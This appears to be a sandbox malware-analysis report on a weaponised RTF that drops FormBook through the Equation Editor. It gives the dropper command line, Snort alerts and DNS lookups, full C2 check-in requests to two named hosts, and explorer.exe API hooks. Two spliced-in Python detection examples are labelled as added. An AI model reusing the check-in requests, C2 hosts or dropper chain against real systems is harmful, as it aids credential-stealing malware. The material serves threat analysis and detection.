                                                File Content Preview:{\rtf1{\*\pnseclvl3\pndec\pnstart1\pnindent720\pnhang {\pntxta .}}{\*\pnseclvl4\pnlcltr\pnstart1\pnindent720\pnhang {\pntxta )}}{\*\pnseclvl5\pndec\pnstart1\pnindent720\pnhang {\pntxtb (}{\pntxta )}}{\*\pnseclvl6.\pnlcltr\pnstart1\pnindent720\pnhang {\pnt
                                                Icon Hash:e4eea2aaa4b4b4a4
Id  Start      Format ID  Format    Classname   Datasize  Filename    Sourcepath          Temppath            Exploit
0   000012A7h  2          embedded  Package     954535    Client.exe  C:\Path\Client.exe  C:\Path\Client.exe  no
1   001DC2BCh  2          embedded  Equation.3  3072                                                          no
Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP     Dest IP
08/08/22-18:39:45.738853  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49171        80         192.168.2.22  66.235.200.170
08/08/22-18:40:04.832440  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49172        80         192.168.2.22  104.167.67.175
08/08/22-18:39:45.738853  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49171        80         192.168.2.22  66.235.200.170
08/08/22-18:40:04.832440  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49172        80         192.168.2.22  104.167.67.175
08/08/22-18:39:45.738853  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49171        80         192.168.2.22  66.235.200.170
08/08/22-18:40:04.832440  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49172        80         192.168.2.22  104.167.67.175
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 8, 2022 18:39:45.721043110 CEST | 49171 | 80 | 192.168.2.22 | 66.235.200.170
Aug 8, 2022 18:39:45.738465071 CEST | 80 | 49171 | 66.235.200.170 | 192.168.2.22
Aug 8, 2022 18:39:45.738708019 CEST | 49171 | 80 | 192.168.2.22 | 66.235.200.170
Aug 8, 2022 18:39:45.738852978 CEST | 49171 | 80 | 192.168.2.22 | 66.235.200.170
Aug 8, 2022 18:39:45.756073952 CEST | 80 | 49171 | 66.235.200.170 | 192.168.2.22
Aug 8, 2022 18:39:46.209754944 CEST | 80 | 49171 | 66.235.200.170 | 192.168.2.22
Aug 8, 2022 18:39:46.209817886 CEST | 80 | 49171 | 66.235.200.170 | 192.168.2.22
Aug 8, 2022 18:39:46.209853888 CEST | 80 | 49171 | 66.235.200.170 | 192.168.2.22
Aug 8, 2022 18:39:46.209891081 CEST | 80 | 49171 | 66.235.200.170 | 192.168.2.22
Aug 8, 2022 18:39:46.209923983 CEST | 80 | 49171 | 66.235.200.170 | 192.168.2.22
Aug 8, 2022 18:39:46.210068941 CEST | 49171 | 80 | 192.168.2.22 | 66.235.200.170
Aug 8, 2022 18:39:46.210129976 CEST | 49171 | 80 | 192.168.2.22 | 66.235.200.170
Aug 8, 2022 18:39:46.210244894 CEST | 49171 | 80 | 192.168.2.22 | 66.235.200.170
Aug 8, 2022 18:39:46.227530956 CEST | 80 | 49171 | 66.235.200.170 | 192.168.2.22
Aug 8, 2022 18:39:46.227902889 CEST | 49171 | 80 | 192.168.2.22 | 66.235.200.170
Aug 8, 2022 18:40:04.628437996 CEST | 49172 | 80 | 192.168.2.22 | 104.167.67.175
Aug 8, 2022 18:40:04.814755917 CEST | 80 | 49172 | 104.167.67.175 | 192.168.2.22
Aug 8, 2022 18:40:04.814852953 CEST | 49172 | 80 | 192.168.2.22 | 104.167.67.175
Aug 8, 2022 18:40:04.832439899 CEST | 49172 | 80 | 192.168.2.22 | 104.167.67.175
Aug 8, 2022 18:40:05.021908045 CEST | 80 | 49172 | 104.167.67.175 | 192.168.2.22
Aug 8, 2022 18:40:05.021940947 CEST | 80 | 49172 | 104.167.67.175 | 192.168.2.22
Aug 8, 2022 18:40:05.021955013 CEST | 80 | 49172 | 104.167.67.175 | 192.168.2.22
Aug 8, 2022 18:40:05.022198915 CEST | 49172 | 80 | 192.168.2.22 | 104.167.67.175
Aug 8, 2022 18:40:05.048086882 CEST | 49172 | 80 | 192.168.2.22 | 104.167.67.175
Aug 8, 2022 18:40:05.233951092 CEST | 80 | 49172 | 104.167.67.175 | 192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 8, 2022 18:39:45.500391006 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8
Aug 8, 2022 18:39:45.673486948 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22
Aug 8, 2022 18:40:04.426235914 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8
Aug 8, 2022 18:40:04.601803064 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 8, 2022 18:39:45.500391006 CEST | 192.168.2.22 | 8.8.8.8 | 0xca6d | Standard query (0) | www.thegoldencamel.online | A (IP address) | IN (0x0001)
Aug 8, 2022 18:40:04.426235914 CEST | 192.168.2.22 | 8.8.8.8 | 0x1666 | Standard query (0) | www.best-boy.net | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 8, 2022 18:39:45.673486948 CEST | 8.8.8.8 | 192.168.2.22 | 0xca6d | No error (0) | www.thegoldencamel.online | thegoldencamel.online | | CNAME (Canonical name) | IN (0x0001)
Aug 8, 2022 18:39:45.673486948 CEST | 8.8.8.8 | 192.168.2.22 | 0xca6d | No error (0) | thegoldencamel.online | | 66.235.200.170 | A (IP address) | IN (0x0001)
Aug 8, 2022 18:40:04.601803064 CEST | 8.8.8.8 | 192.168.2.22 | 0x1666 | No error (0) | www.best-boy.net | | 104.167.67.175 | A (IP address) | IN (0x0001)
                                                • www.thegoldencamel.online
                                                • www.best-boy.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49171 | 66.235.200.170 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 8, 2022 18:39:45.738852978 CEST | 0 | OUT | GET /nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 HTTP/1.1
                                                Host: www.thegoldencamel.online
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
Aug 8, 2022 18:39:46.209754944 CEST | 2 | IN | HTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 16:39:46 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://www.thegoldencamel.online/wp-json/>; rel="https://api.w.org/"
                                                Vary: Accept-Encoding
                                                X-Endurance-Cache-Level: 2
                                                X-nginx-cache: WordPress
                                                CF-Cache-Status: MISS
                                                Server: cloudflare
                                                CF-RAY: 7379b09ee927997b-FRA
                                                Data Raw: 31 36 61 33 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 39 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 
68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 67 6f 6c 64 65 6e 63 61 6d 65 6c 2e 6f 6e 6c 69 6e 65 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 67 6f 6c 64 65 6e 63 61 6d 65 6c 2e 6f 6e 6c 69 6e 65 2f 22 2c 22 73 61 6d 65 41 73 22 3a 5b 5d 2c 22 6c 6f 67
                                                Data Ascii: 16a3<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v19.4 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - The Golden Camel</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - The Golden Camel" /><meta property="og:site_name" content="The Golden Camel" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.thegoldencamel.online/#organization","name":"The Golden Camel","url":"https://www.thegoldencamel.online/","sameAs":[],"log


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49172 | 104.167.67.175 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 8, 2022 18:40:04.832439899 CEST | 8 | OUT | GET /nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 HTTP/1.1
                                                Host: www.best-boy.net
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
Aug 8, 2022 18:40:05.021908045 CEST | 9 | IN | HTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Mon, 08 Aug 2022 16:40:01 GMT
                                                Content-Type: text/html
                                                Content-Length: 2158
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 b3 b2 ba fe bd d8 c9 ce b9 a4 b3 cc d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 2c 26 23 34 39 3b 26 23 35 36 3b 26 23 33 31 31 30 35 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 32 31 38 36 36 3b 26 23 32 31 38 36 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 2c 26 23 33 32 37 36 39 3b 26 23 32 33 33 37 36 3b 26 23 32 31 33 32 30 3b 26 23 32 32 38 31 32 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 35 36 3b 26 23 35 36 3b 26 23 35 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 38 31 3b 26 23 32 31 33 34 35 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 2c 26 23 33 30 30 30 37 3b 26 23 32 32 38 39 39 3b 26 23 32 31 38 36 36 3b 26 23 32 38 36 30 38 3b 26 23 32 38 38 37 32 3b 26 23 33 39 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 32 31 39 34 33 3b 26 23 32 37 37 30 30 3b 26 23 32 31 31 36 30 3b 26 23 32 34 35 37 37 3b 26 23 32 32 32 37 30 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2c 26 23 34 39 3b 26 23 35 36 3b 26 23 33 31 31 30 35 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 32 31 38 36 36 3b 26 23 32 31 38 36 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 2c 
26 23 33 32 37 36 39 3b 26 23 32 33 33 37 36 3b 26 23 32 31 33 32 30 3b 26 23 32 32 38 31 32 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 35 36 3b 26 23 35 36 3b 26 23 35 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 38 31 3b 26 23 32 31 33 34 35 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 2c 26 23 33 30 30 30 37 3b 26 23 32 32 38 39 39 3b 26 23 32 31 38 36 36 3b 26 23 32 38 36 30 38 3b 26 23 32 38 38 37 32 3b 26 23 33 39 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 32 31 39 34 33 3b 26 23 32 37 37 30 30 3b 26 23 32 31 31 36 30 3b 26 23 32 34 35 37 37 3b 26 23 32 32 32 37 30 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 2c 26 23 34 39 3b 26 23 35 36 3b 26 23 33 31 31 30 35 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 32 31 38 36 36 3b 26 23 32 31 38 36 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 2c 26 23 33 32 37 36 39 3b 26 23 32 33 33 37 36 3b 26 23 32 31 33 32 30 3b 26 23 32 32 38 31 32 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 35 36 3b 26 23 35 36 3b 26 23 35 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 38 31 3b 26 23 32 31 33 34 35
                                                Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>,&#49;&#56;&#31105;&#26080;&#36974;&#25377;&#21866;&#21866;&#26080;&#30721;&#32593;&#31449;,&#32769;&#23376;&#21320;&#22812;&#31934;&#21697;&#56;&#56;&#56;&#26080;&#30721;&#19981;&#21345;,&#22269;&#20135;&#31934;&#21697;&#26080;&#30721;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;,&#30007;&#22899;&#21866;&#28608;&#28872;&#39640;&#28526;&#21943;&#27700;&#21160;&#24577;&#22270;</title><meta name="keywords" content=",&#49;&#56;&#31105;&#26080;&#36974;&#25377;&#21866;&#21866;&#26080;&#30721;&#32593;&#31449;,&#32769;&#23376;&#21320;&#22812;&#31934;&#21697;&#56;&#56;&#56;&#26080;&#30721;&#19981;&#21345;,&#22269;&#20135;&#31934;&#21697;&#26080;&#30721;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;,&#30007;&#22899;&#21866;&#28608;&#28872;&#39640;&#28526;&#21943;&#27700;&#21160;&#24577;&#22270;" /><meta name="description" content=",&#49;&#56;&#31105;&#26080;&#36974;&#25377;&#21866;&#21866;&#26080;&#30721;&#32593;&#31449;,&#32769;&#23376;&#21320;&#22812;&#31934;&#21697;&#56;&#56;&#56;&#26080;&#30721;&#19981;&#21345
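
Added example, not from the report: a request-level heuristic for the two check-ins captured in the sessions above. Both requests share one shape: a GET to a short directory (/nb30/), two query parameters of which the first is a long base64-style value and the second a short tag (PPa=ApcXW2), no User-Agent or Accept header, Connection: close, and explorer.exe as the client process. The thresholds and the HOLLOW_HOSTS set are assumptions made here from these two samples and the session tables, not a published signature; the two request texts are copied from the sessions above and the benign control is constructed.

```python
"""Heuristic for the FormBook check-in shape recorded above: GET to a short directory with
two query parameters (one long base64-like, one short tag), no User-Agent/Accept,
Connection: close, sent by a process that has no business talking HTTP."""
import re
from urllib.parse import urlsplit

_B64 = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")   # thresholds chosen here from the two samples
_TAG = re.compile(r"^[A-Za-z0-9]{4,8}$")
_DIR = re.compile(r"^/[a-z0-9]{2,8}/$")
# System binaries this report shows carrying FormBook (explorer.exe in the session table,
# notepad.exe hollowed in the process list); extend from your own telemetry.
HOLLOW_HOSTS = {"explorer.exe", "notepad.exe"}


def parse_request(raw: bytes):
    """Minimal HTTP/1.x request parser: (method, target, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for ln in lines[1:]:
        k, _, v = ln.partition(":")
        headers[k.strip().lower()] = v.strip()
    return method, target, headers, body


def query_pairs(query: str):
    """Split the query by hand: parse_qsl() would turn '+' into ' ' and break the base64 alphabet."""
    return [tuple(p.split("=", 1)) if "=" in p else (p, "") for p in query.split("&") if p]


def checkin_verdict(raw: bytes, process: str = "") -> dict:
    """Score one request; 'match' needs all four request-level traits, the process is extra context."""
    method, target, headers, _body = parse_request(raw)
    url = urlsplit(target)
    pairs = query_pairs(url.query)
    reasons = []
    if method == "GET" and _DIR.match(url.path):
        reasons.append("short-directory path")
    if len(pairs) == 2 and _B64.match(pairs[0][1]) and _TAG.match(pairs[1][1]):
        reasons.append("long base64 value + short tag")
    if "user-agent" not in headers and "accept" not in headers:
        reasons.append("no User-Agent/Accept")
    if headers.get("connection", "").lower() == "close":
        reasons.append("Connection: close")
    match = len(reasons) == 4
    if process.lower() in HOLLOW_HOSTS:
        reasons.append(f"client is {process}")
    return {"match": match, "host": headers.get("host", ""), "path": url.path, "reasons": reasons}


# Request texts copied from the two sessions above; the client process is from the session table.
CHECKINS = [
    (b"GET /nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 HTTP/1.1\r\n"
     b"Host: www.thegoldencamel.online\r\nConnection: close\r\n\r\n", "explorer.exe"),
    (b"GET /nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 HTTP/1.1\r\n"
     b"Host: www.best-boy.net\r\nConnection: close\r\n\r\n", "explorer.exe"),
]
# Constructed benign control: a browser hitting a WordPress REST endpoint.
BENIGN = (b"GET /wp-json/?per_page=10&page=2 HTTP/1.1\r\nHost: example.invalid\r\n"
          b"User-Agent: Mozilla/5.0\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n", "chrome.exe")

if __name__ == "__main__":
    for raw, proc in CHECKINS + [BENIGN]:
        v = checkin_verdict(raw, proc)
        print(v["match"], v["host"], v["path"], v["reasons"])
```

The first host answered 404 from a WordPress site and the second 200 with an unrelated page; FormBook carries a list of domains in its configuration and walks through them, so the bot reaching a host is the indicator, regardless of what the host answers, which is why the Snort SIDs above fire on both GETs.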


                                                Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE6
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE6
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE6
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE6
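
Added example, not from the report, for the inline hooks listed above. The report records that the injected code overwrote the prologues of PeekMessageA/W and GetMessageA/W inside explorer.exe, the message-loop functions through which window input passes, and prints only the first six new bytes of each. The check below does what a hook scanner does: diff an export's mapped prologue against the on-disk copy and decode the trampoline encodings hooking code writes on x64. It is pure Python over constructed bytes: the user32 addresses, the clean prologue and the hook bytes are assumptions, and only the 0x2992000 injected-region address is taken from the explorer.exe Yara hits below. On a live host the memory bytes come from ReadProcessMemory and the disk bytes from the PE file at the same RVA.

```python
"""Tell an inline hook from a normal x64 prologue by diffing an export's mapped bytes
against the DLL on disk, then decode where the trampoline goes."""
import struct

MASK64 = (1 << 64) - 1


def classify_prologue(b: bytes, addr: int) -> dict:
    """Recognise common trampolines; 'target' is the branch destination (for jmp [rip+disp32]
    it is the pointer slot, which holds the real destination)."""
    if len(b) >= 5 and b[0] == 0xE9:                                         # jmp rel32
        return {"kind": "jmp rel32", "target": (addr + 5 + struct.unpack_from("<i", b, 1)[0]) & MASK64}
    if len(b) >= 6 and b[:2] == b"\xFF\x25":                                 # jmp qword ptr [rip+disp32]
        return {"kind": "jmp [rip+disp32]", "target": (addr + 6 + struct.unpack_from("<i", b, 2)[0]) & MASK64}
    if len(b) >= 12 and b[:2] == b"\x48\xB8" and b[10:12] == b"\xFF\xE0":    # mov rax, imm64 ; jmp rax
        return {"kind": "mov rax,imm64; jmp rax", "target": struct.unpack_from("<Q", b, 2)[0]}
    if len(b) >= 6 and b[0] == 0x68 and b[5] == 0xC3:                        # push imm32 ; ret (32-bit reach)
        return {"kind": "push imm32; ret", "target": struct.unpack_from("<I", b, 1)[0]}
    if len(b) >= 2 and b[0] == 0xEB:                                         # jmp rel8 (hot-patch pad style)
        return {"kind": "jmp rel8", "target": (addr + 2 + struct.unpack_from("<b", b, 1)[0]) & MASK64}
    if b[:1] == b"\xCC":
        return {"kind": "int3", "target": None}
    return {"kind": "ordinary", "target": None}


def compare_prologue(name, addr, disk, memory, module_range):
    """One export: hooked if mapped bytes differ from disk; flag a branch that leaves the module."""
    n = min(len(disk), len(memory))
    hooked = disk[:n] != memory[:n]
    info = classify_prologue(memory, addr) if hooked else {"kind": "ordinary", "target": None}
    lo, hi = module_range
    t = info["target"]
    return {"function": name, "hooked": hooked, "kind": info["kind"], "target": t,
            "leaves_module": t is not None and not (lo <= t < hi)}


# Constructed fixtures: module range, export RVAs and prologue bytes are assumptions.
USER32 = (0x00007FFB12340000, 0x00007FFB124E0000)
EXPORTS = {"GetMessageW": USER32[0] + 0x1A2B0, "PeekMessageA": USER32[0] + 0x1D7C0}
# A typical x64 export prologue: save rbx/rsi, push rdi, carve a shadow-space frame.
CLEAN = bytes.fromhex("48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20")
INJECTED = 0x0000000002992000   # address of the explorer.exe region the Yara hits below sit in


def hook_with_mov_jmp(target: int) -> bytes:
    """The 12-byte absolute trampoline a 64-bit hooker writes when the payload is >2 GiB away."""
    return b"\x48\xB8" + struct.pack("<Q", target) + b"\xFF\xE0" + CLEAN[12:]


def scan_sample():
    """Compare two exports: one patched to jump into the injected region, one untouched."""
    memory = {"GetMessageW": hook_with_mov_jmp(INJECTED + 0x100), "PeekMessageA": CLEAN}
    return [compare_prologue(n, EXPORTS[n], CLEAN, memory[n], USER32) for n in EXPORTS]


if __name__ == "__main__":
    for r in scan_sample():
        tgt = f"{r['target']:#x}" if r["target"] is not None else "-"
        print(f"{r['function']:<13} hooked={r['hooked']!s:<5} {r['kind']:<24} target={tgt} "
              f"leaves_module={r['leaves_module']}")
```

A branch out of the module into an unbacked, writable region (the report lists the hit at 0x2992000 as an explorer.exe memory dump, not a mapped image) is the strong signal; a differing prologue alone can also come from legitimate hot-patching, so the target check is what separates the two.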


                                                Target ID:0
                                                Start time:18:38:13
                                                Start date:08/08/2022
                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                Imagebase:0x13f020000
                                                File size:1423704 bytes
                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:2
                                                Start time:18:38:16
                                                Start date:08/08/2022
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                Imagebase:0x400000
                                                File size:543304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:3
                                                Start time:18:38:17
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:CmD.exe /C %tmp%\Client.exe A C
                                                Imagebase:0x4a120000
                                                File size:302592 bytes
                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:6
                                                Start time:18:38:18
                                                Start date:08/08/2022
                                                Path:C:\Users\user\AppData\Local\Temp\Client.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Local\Temp\Client.exe A C
                                                Imagebase:0xa20000
                                                File size:954368 bytes
                                                MD5 hash:B4F00BB75BFD5C4E2C9D0CD6070E8E54
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
